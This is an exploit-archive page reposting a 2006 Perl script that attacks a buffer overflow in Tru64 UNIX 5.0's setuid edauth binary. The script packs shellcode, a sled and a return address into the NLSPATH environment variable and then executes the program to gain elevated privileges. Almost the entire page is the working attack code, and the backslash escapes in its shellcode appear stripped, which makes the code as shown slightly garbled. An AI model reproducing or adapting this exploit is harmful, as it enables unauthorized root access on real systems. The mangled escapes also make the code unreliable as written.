[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit
# Published : 2006-03-29
# Author : Kevin Finisterre
# Previous Title : Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit
# Next Title : X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit
#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";
print "Shellcode is " . length($sc) . " bytes long n";
$tlen = (1024-(length($sc)))/4;
$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x140010200 Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain)
# 0x140012002
$ret = "x02x20x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
$heapgrow = "B" x 10000 . " " . "C" x 10000 . "D" x 10000;
exec("/usr/tcb/bin/edauth -df DMr0x.$heapgrow");
# www.Syue.com [2006-03-29]